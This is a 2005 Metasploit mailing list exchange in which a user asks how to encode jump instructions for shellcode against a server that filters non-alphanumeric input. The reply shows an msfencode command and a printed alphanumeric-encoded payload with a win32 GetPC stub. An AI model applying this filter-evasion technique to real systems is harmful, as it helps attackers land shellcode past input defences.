Opcode db suggestion and msfencode question

[mmiller at hick.org (mmiller at hick.org)]

On Wed, May 25, 2005 at 04:51:53PM +0200, RaMatkal wrote:
> Great work on 2.4!
>
> A quick suggestion and a question....
>
> The opcode database is terrific! A really nifty addition to the opcode db would be the ability to specify bad 
> characters to filter from the return addresses....For example, only show those return addresses whose ascii values 
> are valid alphanumeric characters....

This is a good suggestion, we'll look into adding it at some point in
the future.  Thanks!

> Now for my question....im trying to exploit a server which filters all non-alpha numeric characters.....in order to 
> land on my encoded shellcode, i need to do a couple of jumps....since 'eb' and 'e9' are filtered i figure i can 
> encode the jumps with msfencode...
>
> anyone done this before or have any neat advice on how to do JMP's when only alphanumeric chars are valid..
>
> I tried putting an 'eb 06' into <filename> and then trying: 
>
> /msfencode -i <filename> -e PexAlphaNum 
>
> but got back a 79 byte payload which still contained a couple of 'eb' s  (obviously needed for the encoder function 
> at the beginning right?)....

Well, assuming you are exploiting something on win32, you can use an
entirely alphanum geteip.  Other platforms rely on a small non-alphanum
stub to get eip which can generally lead to problems.  Here's an
example:

$ perl -e "\xcc" | ./msfencode -e PexAlphaNum GETPCTYPE=win32             
[*] Using Msf::Encoder::PexAlphaNum with final size of 123 bytes
"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48\x50\x68".
"\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41\x51\x51\x44\x44".
"\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58\x56\x6a\x30\x50\x50\x54".
"\x55\x50\x50\x61\x33\x30\x31\x30\x38\x39\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x5a";

Give that a shot and see if it works for you.